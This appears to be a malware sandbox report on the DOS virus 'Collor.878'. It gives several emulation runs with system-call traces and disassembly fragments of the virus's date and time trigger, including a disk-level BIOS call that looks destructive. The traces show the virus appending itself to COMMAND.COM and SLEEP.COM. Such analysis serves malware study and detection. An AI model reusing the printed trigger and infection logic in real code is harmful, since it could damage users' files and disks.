Sample viewer

vx.netlux.org/Virus.DOS.Collor.878

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:07:48.32651532Z 42 PC: 1c093 | Get date 0x1c093: cmp cx, 0x7c8
0x1c097: jge 0x1c0a1
0x1c099: cmp dh, 6
0x1c09c: jae 0x1c0a1
0x1c09e: jmp 0x1c0d4
0x1c0a0: nop
0x1c0a1: mov ah, 0x2c
0x1c0a3: int 0x21
0x1c0a5: cmp dh, 1
0x1c0a8: jae 0x1c0cb
0x1c0aa: mov si, 0xffb0
0x1c0ad: mov dl, byte ptr [si]
0x1c0af: or dl, dl
0x1c0b1: je 0x1c0ba
0x1c0b3: mov ah, 2
0x1c0b5: int 0x21
0x1c0b7: inc si
0x1c0b8: jmp 0x1c0ad
0x1c0ba: mov al, 0x10
0x1c0bc: mov bx, 0
2018-12-17T23:07:48.330275638Z 44 PC: 1c0a5 | Get time 0x1c0a5: cmp dh, 1
0x1c0a8: jae 0x1c0cb
0x1c0aa: mov si, 0xffb0
0x1c0ad: mov dl, byte ptr [si]
0x1c0af: or dl, dl
0x1c0b1: je 0x1c0ba
0x1c0b3: mov ah, 2
0x1c0b5: int 0x21
0x1c0b7: inc si
0x1c0b8: jmp 0x1c0ad
0x1c0ba: mov al, 0x10
0x1c0bc: mov bx, 0
0x1c0bf: mov cx, 0
0x1c0c2: mov dl, 0x80
0x1c0c4: mov dh, 0
0x1c0c6: mov ah, 7
0x1c0c8: int 0x13
0x1c0ca: ret
0x1c0cb: cmp dh, 2
0x1c0ce: jae 0x1c0d4
2018-12-17T23:07:48.333831411Z 71 PC: 1c153 | Get current directory
2018-12-17T23:07:48.337608952Z 26 PC: 1c15a | Set disk transfer address
2018-12-17T23:07:48.339692348Z 25 PC: 1c15e | Get default drive
2018-12-17T23:07:48.342117386Z 14 PC: 1c169 | Set default drive (Drive = 'C')
2018-12-17T23:07:48.344744304Z 78 PC: 1c218 | Find first file
2018-12-17T23:07:48.351379557Z 61 PC: 1c262 | Open file (Filename = 'COMMAND.COM')
2018-12-17T23:07:48.358888401Z 66 PC: 1c274 | Move file pointer
2018-12-17T23:07:48.361100499Z 66 PC: 1c286 | Move file pointer
2018-12-17T23:07:48.363323899Z 63 PC: 1c290 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:07:48.367461917Z 66 PC: 1c2a0 | Move file pointer
2018-12-17T23:07:48.369619733Z 64 PC: 1c2af | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:48.373158094Z 66 PC: 1c2b9 | Move file pointer
2018-12-17T23:07:48.376061873Z 64 PC: 1c308 | Write file or device (Write 875 bytes on handle 5)
2018-12-17T23:07:48.723808659Z 64 PC: 1c314 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:48.727350848Z 87 PC: 1c325 | Get or set file date and time
2018-12-17T23:07:48.730434224Z 62 PC: 1c329 | Close file
2018-12-17T23:07:48.739679241Z 79 PC: 1c34d | Find next file
2018-12-17T23:07:48.742850382Z 14 PC: 1c178 | Set default drive (Drive = 'A')
2018-12-17T23:07:48.746519018Z 78 PC: 1c218 | Find first file
2018-12-17T23:07:48.753401415Z 61 PC: 1c262 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:07:48.760707668Z 66 PC: 1c274 | Move file pointer
2018-12-17T23:07:48.762876295Z 66 PC: 1c286 | Move file pointer
2018-12-17T23:07:48.765643727Z 63 PC: 1c290 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:07:48.77316244Z 66 PC: 1c2a0 | Move file pointer
2018-12-17T23:07:48.775009873Z 64 PC: 1c2af | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:48.77957828Z 66 PC: 1c2b9 | Move file pointer
2018-12-17T23:07:48.781614698Z 64 PC: 1c308 | Write file or device (Write 875 bytes on handle 5)
2018-12-17T23:07:48.797290104Z 64 PC: 1c314 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:48.80362406Z 87 PC: 1c325 | Get or set file date and time
2018-12-17T23:07:48.807313415Z 62 PC: 1c329 | Close file
2018-12-17T23:07:48.816661396Z 79 PC: 1c34d | Find next file
2018-12-17T23:07:48.834702138Z 25 PC: 1c187 | Get default drive
2018-12-17T23:07:48.836858471Z 99 PC: 14eec | Get DBCS lead byte table pointer
2018-12-17T23:07:48.838839064Z 48 PC: 14f00 | Get DOS version
2018-12-17T23:07:48.841880171Z 2 PC: 13454 | Character output (Char = '56')
2018-12-17T23:07:48.844744704Z 2 PC: 13454 | Character output (Char = '65')
2018-12-17T23:07:48.847617354Z 2 PC: 13454 | Character output (Char = '72')
2018-12-17T23:07:48.851952743Z 2 PC: 13454 | Character output (Char = '73')
2018-12-17T23:07:48.855232128Z 2 PC: 13454 | Character output (Char = '61')
2018-12-17T23:07:48.858030578Z 2 PC: 13454 | Character output (Char = '6f')
2018-12-17T23:07:48.865285265Z 2 PC: 13454 | Character output (Char = '20')
2018-12-17T23:07:48.868089827Z 2 PC: 13454 | Character output (Char = '69')
2018-12-17T23:07:48.870991852Z 2 PC: 13454 | Character output (Char = '6e')
2018-12-17T23:07:48.874043939Z 2 PC: 13454 | Character output (Char = '63')
2018-12-17T23:07:48.878144697Z 2 PC: 13454 | Character output (Char = '6f')
2018-12-17T23:07:48.880774761Z 2 PC: 13454 | Character output (Char = '72')
2018-12-17T23:07:48.88318964Z 2 PC: 13454 | Character output (Char = '72')
2018-12-17T23:07:48.886620179Z 2 PC: 13454 | Character output (Char = '65')
2018-12-17T23:07:48.888958925Z 2 PC: 13454 | Character output (Char = '74')
2018-12-17T23:07:48.891293373Z 2 PC: 13454 | Character output (Char = '61')
2018-12-17T23:07:48.89469094Z 2 PC: 13454 | Character output (Char = '20')
2018-12-17T23:07:48.896999599Z 2 PC: 13454 | Character output (Char = '64')
2018-12-17T23:07:48.899301967Z 2 PC: 13454 | Character output (Char = '6f')
2018-12-17T23:07:48.902294142Z 2 PC: 13454 | Character output (Char = '20')
2018-12-17T23:07:48.906168895Z 2 PC: 13454 | Character output (Char = '44')
2018-12-17T23:07:48.908730029Z 2 PC: 13454 | Character output (Char = '4f')
2018-12-17T23:07:48.912076239Z 2 PC: 13454 | Character output (Char = '53')
2018-12-17T23:07:48.91443866Z 2 PC: 13454 | Character output (Char = '0d')
2018-12-17T23:07:48.919722392Z 2 PC: 13454 | Character output (Char = '0a')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":2,"TimeBased":true,"OriginalID":15982,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:00.878374109Z 42 PC: 1c093 | Get date 0x1c093: cmp cx, 0x7c8
0x1c097: jge 0x1c0a1
0x1c099: cmp dh, 6
0x1c09c: jae 0x1c0a1
0x1c09e: jmp 0x1c0d4
0x1c0a0: nop
0x1c0a1: mov ah, 0x2c
0x1c0a3: int 0x21
0x1c0a5: cmp dh, 1
0x1c0a8: jae 0x1c0cb
0x1c0aa: mov si, 0xffb0
0x1c0ad: mov dl, byte ptr [si]
0x1c0af: or dl, dl
0x1c0b1: je 0x1c0ba
0x1c0b3: mov ah, 2
0x1c0b5: int 0x21
0x1c0b7: inc si
0x1c0b8: jmp 0x1c0ad
0x1c0ba: mov al, 0x10
0x1c0bc: mov bx, 0
2018-12-25T12:45:00.882634536Z 71 PC: 1c153 | Get current directory
2018-12-25T12:45:00.886202722Z 26 PC: 1c15a | Set disk transfer address
2018-12-25T12:45:00.887573949Z 25 PC: 1c15e | Get default drive
2018-12-25T12:45:00.889651845Z 14 PC: 1c169 | Set default drive (Drive = 'C')
2018-12-25T12:45:00.891369998Z 78 PC: 1c218 | Find first file
2018-12-25T12:45:00.897741406Z 61 PC: 1c262 | Open file (Filename = 'COMMAND.COM')
2018-12-25T12:45:00.904977486Z 66 PC: 1c274 | Move file pointer
2018-12-25T12:45:00.906527656Z 66 PC: 1c286 | Move file pointer
2018-12-25T12:45:00.908090744Z 63 PC: 1c290 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:45:00.912326491Z 66 PC: 1c2a0 | Move file pointer
2018-12-25T12:45:00.913923115Z 64 PC: 1c2af | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:00.916837977Z 66 PC: 1c2b9 | Move file pointer
2018-12-25T12:45:00.918576071Z 64 PC: 1c308 | Write file or device (Write 875 bytes on handle 5)
2018-12-25T12:45:01.263150389Z 64 PC: 1c314 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:01.266565142Z 87 PC: 1c325 | Get or set file date and time
2018-12-25T12:45:01.268596735Z 62 PC: 1c329 | Close file
2018-12-25T12:45:01.276812686Z 79 PC: 1c34d | Find next file
2018-12-25T12:45:01.279699758Z 14 PC: 1c178 | Set default drive (Drive = 'A')
2018-12-25T12:45:01.281296512Z 78 PC: 1c218 | Find first file (See above)
2018-12-25T12:45:01.28894262Z 61 PC: 1c262 | Open file (See above)
2018-12-25T12:45:01.297414606Z 66 PC: 1c274 | Move file pointer (See above)
2018-12-25T12:45:01.298740523Z 66 PC: 1c286 | Move file pointer (See above)
2018-12-25T12:45:01.300964782Z 63 PC: 1c290 | Read file or device (See above)
2018-12-25T12:45:01.308350469Z 66 PC: 1c2a0 | Move file pointer (See above)
2018-12-25T12:45:01.310455315Z 64 PC: 1c2af | Write file or device (See above)
2018-12-25T12:45:01.315563917Z 66 PC: 1c2b9 | Move file pointer (See above)
2018-12-25T12:45:01.318552275Z 64 PC: 1c308 | Write file or device (See above)
2018-12-25T12:45:01.334983076Z 64 PC: 1c314 | Write file or device (See above)
2018-12-25T12:45:01.36203153Z 87 PC: 1c325 | Get or set file date and time (See above)
2018-12-25T12:45:01.364695187Z 62 PC: 1c329 | Close file (See above)
2018-12-25T12:45:01.373953387Z 79 PC: 1c34d | Find next file (See above)
2018-12-25T12:45:01.377697265Z 25 PC: 1c187 | Get default drive
2018-12-25T12:45:01.379749698Z 99 PC: 14eec | Get DBCS lead byte table pointer
2018-12-25T12:45:01.381455665Z 48 PC: 14f00 | Get DOS version
2018-12-25T12:45:01.386333374Z 2 PC: 13454 | Character output (Char = '56')
2018-12-25T12:45:01.393713586Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.397905472Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.402817347Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.405071376Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.407072436Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.409238671Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.411455438Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.413701503Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.41585078Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.419314374Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.421634566Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.42535299Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.428476982Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.431602407Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.434483741Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.437717537Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.440326187Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.442913304Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.446557354Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.449031099Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.451432109Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.454239519Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.456713967Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.458959736Z 2 PC: 13454 | Character output (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":2,"TimeBased":true,"OriginalID":15982,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:01.386936985Z 42 PC: 1c093 | Get date 0x1c093: cmp cx, 0x7c8
0x1c097: jge 0x1c0a1
0x1c099: cmp dh, 6
0x1c09c: jae 0x1c0a1
0x1c09e: jmp 0x1c0d4
0x1c0a0: nop
0x1c0a1: mov ah, 0x2c
0x1c0a3: int 0x21
0x1c0a5: cmp dh, 1
0x1c0a8: jae 0x1c0cb
0x1c0aa: mov si, 0xffb0
0x1c0ad: mov dl, byte ptr [si]
0x1c0af: or dl, dl
0x1c0b1: je 0x1c0ba
0x1c0b3: mov ah, 2
0x1c0b5: int 0x21
0x1c0b7: inc si
0x1c0b8: jmp 0x1c0ad
0x1c0ba: mov al, 0x10
0x1c0bc: mov bx, 0
2018-12-25T12:45:01.389011185Z 71 PC: 1c153 | Get current directory
2018-12-25T12:45:01.391947834Z 26 PC: 1c15a | Set disk transfer address
2018-12-25T12:45:01.393750023Z 25 PC: 1c15e | Get default drive
2018-12-25T12:45:01.394756964Z 14 PC: 1c169 | Set default drive (Drive = 'C')
2018-12-25T12:45:01.395839659Z 78 PC: 1c218 | Find first file
2018-12-25T12:45:01.401714919Z 61 PC: 1c262 | Open file (Filename = 'COMMAND.COM')
2018-12-25T12:45:01.407642274Z 66 PC: 1c274 | Move file pointer
2018-12-25T12:45:01.409263688Z 66 PC: 1c286 | Move file pointer
2018-12-25T12:45:01.411431585Z 63 PC: 1c290 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:45:01.414260182Z 66 PC: 1c2a0 | Move file pointer
2018-12-25T12:45:01.41584978Z 64 PC: 1c2af | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:01.419296332Z 66 PC: 1c2b9 | Move file pointer
2018-12-25T12:45:01.420815884Z 64 PC: 1c308 | Write file or device (Write 875 bytes on handle 5)
2018-12-25T12:45:01.763300379Z 64 PC: 1c314 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:01.766936659Z 87 PC: 1c325 | Get or set file date and time
2018-12-25T12:45:01.768374358Z 62 PC: 1c329 | Close file
2018-12-25T12:45:01.964214003Z 79 PC: 1c34d | Find next file
2018-12-25T12:45:01.967205087Z 14 PC: 1c178 | Set default drive (Drive = 'A')
2018-12-25T12:45:01.968348977Z 78 PC: 1c218 | Find first file (See above)
2018-12-25T12:45:01.974150878Z 61 PC: 1c262 | Open file (See above)
2018-12-25T12:45:01.98099613Z 66 PC: 1c274 | Move file pointer (See above)
2018-12-25T12:45:01.982427902Z 66 PC: 1c286 | Move file pointer (See above)
2018-12-25T12:45:01.983742426Z 63 PC: 1c290 | Read file or device (See above)
2018-12-25T12:45:01.990398853Z 66 PC: 1c2a0 | Move file pointer (See above)
2018-12-25T12:45:01.991660801Z 64 PC: 1c2af | Write file or device (See above)
2018-12-25T12:45:01.994089514Z 66 PC: 1c2b9 | Move file pointer (See above)
2018-12-25T12:45:01.996058293Z 64 PC: 1c308 | Write file or device (See above)
2018-12-25T12:45:02.10834078Z 64 PC: 1c314 | Write file or device (See above)
2018-12-25T12:45:02.111001178Z 87 PC: 1c325 | Get or set file date and time (See above)
2018-12-25T12:45:02.113048842Z 62 PC: 1c329 | Close file (See above)
2018-12-25T12:45:02.12045017Z 79 PC: 1c34d | Find next file (See above)
2018-12-25T12:45:02.122964819Z 25 PC: 1c187 | Get default drive
2018-12-25T12:45:02.125586516Z 99 PC: 14eec | Get DBCS lead byte table pointer
2018-12-25T12:45:02.12664977Z 48 PC: 14f00 | Get DOS version
2018-12-25T12:45:02.12802741Z 2 PC: 13454 | Character output (Char = '56')
2018-12-25T12:45:02.131362881Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.133495639Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.136454094Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.138765645Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.156293129Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.158440591Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.160692066Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.163197332Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.165490625Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.168120136Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.170293332Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.172664407Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.175746154Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.178023012Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.180205272Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.183114198Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.185499763Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.187868161Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.19154885Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.193894069Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.196296594Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.199342363Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.201731648Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.204174316Z 2 PC: 13454 | Character output (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15982,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:01.647239171Z 42 PC: 1c093 | Get date 0x1c093: cmp cx, 0x7c8
0x1c097: jge 0x1c0a1
0x1c099: cmp dh, 6
0x1c09c: jae 0x1c0a1
0x1c09e: jmp 0x1c0d4
0x1c0a0: nop
0x1c0a1: mov ah, 0x2c
0x1c0a3: int 0x21
0x1c0a5: cmp dh, 1
0x1c0a8: jae 0x1c0cb
0x1c0aa: mov si, 0xffb0
0x1c0ad: mov dl, byte ptr [si]
0x1c0af: or dl, dl
0x1c0b1: je 0x1c0ba
0x1c0b3: mov ah, 2
0x1c0b5: int 0x21
0x1c0b7: inc si
0x1c0b8: jmp 0x1c0ad
0x1c0ba: mov al, 0x10
0x1c0bc: mov bx, 0
2018-12-25T12:45:01.64989754Z 71 PC: 1c153 | Get current directory
2018-12-25T12:45:01.652402465Z 26 PC: 1c15a | Set disk transfer address
2018-12-25T12:45:01.653334085Z 25 PC: 1c15e | Get default drive
2018-12-25T12:45:01.65466961Z 14 PC: 1c169 | Set default drive (Drive = 'C')
2018-12-25T12:45:01.655558425Z 78 PC: 1c218 | Find first file
2018-12-25T12:45:01.660624141Z 61 PC: 1c262 | Open file (Filename = 'COMMAND.COM')
2018-12-25T12:45:01.666552661Z 66 PC: 1c274 | Move file pointer
2018-12-25T12:45:01.667774052Z 66 PC: 1c286 | Move file pointer
2018-12-25T12:45:01.668865233Z 63 PC: 1c290 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:45:01.671627375Z 66 PC: 1c2a0 | Move file pointer
2018-12-25T12:45:01.672789783Z 64 PC: 1c2af | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:01.675200085Z 66 PC: 1c2b9 | Move file pointer
2018-12-25T12:45:01.677038196Z 64 PC: 1c308 | Write file or device (Write 875 bytes on handle 5)
2018-12-25T12:45:02.108019104Z 64 PC: 1c314 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:02.111532878Z 87 PC: 1c325 | Get or set file date and time
2018-12-25T12:45:02.113533008Z 62 PC: 1c329 | Close file
2018-12-25T12:45:02.120396334Z 79 PC: 1c34d | Find next file
2018-12-25T12:45:02.124175609Z 14 PC: 1c178 | Set default drive (Drive = 'A')
2018-12-25T12:45:02.126426445Z 78 PC: 1c218 | Find first file (See above)
2018-12-25T12:45:02.132558518Z 61 PC: 1c262 | Open file (See above)
2018-12-25T12:45:02.141140811Z 66 PC: 1c274 | Move file pointer (See above)
2018-12-25T12:45:02.143733075Z 66 PC: 1c286 | Move file pointer (See above)
2018-12-25T12:45:02.145390678Z 63 PC: 1c290 | Read file or device (See above)
2018-12-25T12:45:02.151985096Z 66 PC: 1c2a0 | Move file pointer (See above)
2018-12-25T12:45:02.153914041Z 64 PC: 1c2af | Write file or device (See above)
2018-12-25T12:45:02.156546272Z 66 PC: 1c2b9 | Move file pointer (See above)
2018-12-25T12:45:02.158218631Z 64 PC: 1c308 | Write file or device (See above)
2018-12-25T12:45:02.176773808Z 64 PC: 1c314 | Write file or device (See above)
2018-12-25T12:45:02.179176523Z 87 PC: 1c325 | Get or set file date and time (See above)
2018-12-25T12:45:02.181110953Z 62 PC: 1c329 | Close file (See above)
2018-12-25T12:45:02.188287061Z 79 PC: 1c34d | Find next file (See above)
2018-12-25T12:45:02.192582926Z 25 PC: 1c187 | Get default drive
2018-12-25T12:45:02.194485999Z 99 PC: 14eec | Get DBCS lead byte table pointer
2018-12-25T12:45:02.195657327Z 48 PC: 14f00 | Get DOS version
2018-12-25T12:45:02.19791044Z 2 PC: 13454 | Character output (Char = '56')
2018-12-25T12:45:02.199987456Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.202003755Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.205069028Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.207403856Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.209754852Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.213104802Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.215183665Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.217189662Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.219493459Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.221668321Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.223597628Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.226004246Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.227915551Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.229791581Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.232714458Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.235085416Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.237387987Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.240510745Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.24258075Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.244523042Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.246904684Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.248899005Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.250878802Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.253461804Z 2 PC: 13454 | Character output (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15982,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:01.47777514Z 42 PC: 1c093 | Get date 0x1c093: cmp cx, 0x7c8
0x1c097: jge 0x1c0a1
0x1c099: cmp dh, 6
0x1c09c: jae 0x1c0a1
0x1c09e: jmp 0x1c0d4
0x1c0a0: nop
0x1c0a1: mov ah, 0x2c
0x1c0a3: int 0x21
0x1c0a5: cmp dh, 1
0x1c0a8: jae 0x1c0cb
0x1c0aa: mov si, 0xffb0
0x1c0ad: mov dl, byte ptr [si]
0x1c0af: or dl, dl
0x1c0b1: je 0x1c0ba
0x1c0b3: mov ah, 2
0x1c0b5: int 0x21
0x1c0b7: inc si
0x1c0b8: jmp 0x1c0ad
0x1c0ba: mov al, 0x10
0x1c0bc: mov bx, 0
2018-12-25T12:45:01.481096752Z 71 PC: 1c153 | Get current directory
2018-12-25T12:45:01.484468159Z 26 PC: 1c15a | Set disk transfer address
2018-12-25T12:45:01.486008778Z 25 PC: 1c15e | Get default drive
2018-12-25T12:45:01.488812423Z 14 PC: 1c169 | Set default drive (Drive = 'C')
2018-12-25T12:45:01.490531651Z 78 PC: 1c218 | Find first file
2018-12-25T12:45:01.496901628Z 61 PC: 1c262 | Open file (Filename = 'COMMAND.COM')
2018-12-25T12:45:01.50495328Z 66 PC: 1c274 | Move file pointer
2018-12-25T12:45:01.506616815Z 66 PC: 1c286 | Move file pointer
2018-12-25T12:45:01.508155944Z 63 PC: 1c290 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:45:01.512175879Z 66 PC: 1c2a0 | Move file pointer
2018-12-25T12:45:01.513634742Z 64 PC: 1c2af | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:01.516536292Z 66 PC: 1c2b9 | Move file pointer
2018-12-25T12:45:01.521923932Z 64 PC: 1c308 | Write file or device (Write 875 bytes on handle 5)
2018-12-25T12:45:01.877695739Z 64 PC: 1c314 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:01.882025011Z 87 PC: 1c325 | Get or set file date and time
2018-12-25T12:45:01.884178505Z 62 PC: 1c329 | Close file
2018-12-25T12:45:01.892086423Z 79 PC: 1c34d | Find next file
2018-12-25T12:45:01.894748467Z 14 PC: 1c178 | Set default drive (Drive = 'A')
2018-12-25T12:45:01.902552311Z 78 PC: 1c218 | Find first file (See above)
2018-12-25T12:45:01.909715043Z 61 PC: 1c262 | Open file (See above)
2018-12-25T12:45:01.91690731Z 66 PC: 1c274 | Move file pointer (See above)
2018-12-25T12:45:01.919116243Z 66 PC: 1c286 | Move file pointer (See above)
2018-12-25T12:45:01.920590124Z 63 PC: 1c290 | Read file or device (See above)
2018-12-25T12:45:01.927477623Z 66 PC: 1c2a0 | Move file pointer (See above)
2018-12-25T12:45:01.930033183Z 64 PC: 1c2af | Write file or device (See above)
2018-12-25T12:45:01.932955758Z 66 PC: 1c2b9 | Move file pointer (See above)
2018-12-25T12:45:01.934766533Z 64 PC: 1c308 | Write file or device (See above)
2018-12-25T12:45:01.952089191Z 64 PC: 1c314 | Write file or device (See above)
2018-12-25T12:45:01.954876551Z 87 PC: 1c325 | Get or set file date and time (See above)
2018-12-25T12:45:01.956229747Z 62 PC: 1c329 | Close file (See above)
2018-12-25T12:45:01.96552272Z 79 PC: 1c34d | Find next file (See above)
2018-12-25T12:45:01.968849209Z 25 PC: 1c187 | Get default drive
2018-12-25T12:45:01.970534017Z 99 PC: 14eec | Get DBCS lead byte table pointer
2018-12-25T12:45:01.972506249Z 48 PC: 14f00 | Get DOS version
2018-12-25T12:45:01.974202755Z 2 PC: 13454 | Character output (Char = '56')
2018-12-25T12:45:01.976631715Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.979156502Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.981849094Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.983969948Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.986183423Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.988517658Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.990718739Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.992991626Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.995438504Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.997527747Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.999844648Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.002704277Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.00505357Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.007797947Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.010735234Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.012961665Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.015137661Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.018368489Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.020581665Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.02284904Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.025512341Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.02773509Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.029942465Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.032528212Z 2 PC: 13454 | Character output (See above)